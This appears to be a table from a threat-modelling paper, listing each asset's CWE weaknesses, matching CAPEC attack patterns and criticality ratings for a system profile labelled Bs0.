Table 7.
Threat profile for Bs0.
| Assetid (Data-Level, Data-Phase) |
Weaknesses | Threats | Criticality (Bt, Tc, Bi) |
|---|---|---|---|
| Agt0 ((bD, mD), (Dr, Dp, Dt)) |
CWE-494: Download of Code Without Integrity Check [35] | CAPEC-662: Adversary in the Browser (AiTB) [36] | (M, M, L) → L |
| Agt0 ((bD, mD), (Dr)) | CWE-921: Storage of Sensitive Data in a Mechanism without Access Control [35] | CAPEC-196: Session Credential Falsification through Forging [36] | (L, L, M) → L |
| Agt1 (mD, Dr) | CWE-922: Insecure Storage of Sensitive Information [35] | CAPEC-529: Malware-Directed Internal Reconnaissance [36] | (M, M, H) → H |
| Net0 (md, Dt) | CWE-319: Cleartext Transmission of Sensitive Information [35] | CAPEC-102: Session Sidejacking [36] | (M, L, L) → VL |
| Net0 (mD, Dp) | CWE-284: Improper Access Control [35] | CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs [36] | (M, M, L) → L |
| Net3 (mD, Dp) | CWE-308: Use of Single-factor Authentication [35] | CAPEC-151: Identity Spoofing [36] | (H, M, H) → VH |
| Net3 (bD, Dt) | CWE-770: Allocation of Resources Without Limits or Throttling [35] | CAPEC-125: Flooding [36] | (H, H, H) → VH |
| App0 ((bD, mD), Dp) | CWE-308: Use of Single-factor Authentication [35] | CAPEC-151: Identity Spoofing [36] | (H, M, H) → VH |
| App0 (bD, Dp) | CWE-20: Improper Input Validation [35] | CAPEC-63: Cross-Site Scripting (XSS) [37] | (H, H, H) → VH |